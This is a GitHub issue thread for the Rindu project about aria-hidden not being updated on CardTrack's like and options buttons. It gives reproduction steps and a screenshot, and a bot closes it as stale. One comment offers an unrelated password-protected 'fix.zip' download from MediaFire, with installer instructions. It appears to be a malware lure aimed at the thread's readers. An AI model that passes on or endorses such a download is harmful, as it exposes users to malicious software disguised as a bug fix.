### ISSUE TITLE
Blocked aria-hidden on a <button> element

### ISSUE THREAD

**Issue by MarcoMadera** [MarcoMadera/Rindu#327]
**Describe the bug**
[CardTrack](https://main--62c0c8de6b5dd3fac001eb94.chromatic.com/?path=/story/components-cardtrack--default) like button and option buttons aria-hidden not getting updated when they are visible

**To Reproduce**
1. Go to artist page
2. Hover on [CardTrack](https://main--62c0c8de6b5dd3fac001eb94.chromatic.com/?path=/story/components-cardtrack--default)
3. Click on the options button
4. See error in console

**Expected behavior**
On hover cardTrack as option button is visible aria-hidden should be false or not present

**Screenshots**
<img width="1258" alt="image" src="https://github.com/user-attachments/assets/bc4d88f6-7d3e-41ab-bfb9-fe3820b456d0">

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context**
- Product: [e.g. premium, open]
- Page: [e.g. /dashboard, playlist/{id}]

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SawBot** [comment]
This issue has been marked as stale due to inactivity.

**Comment by SawBot** [comment]
Closing this issue due to prolonged inactivity.
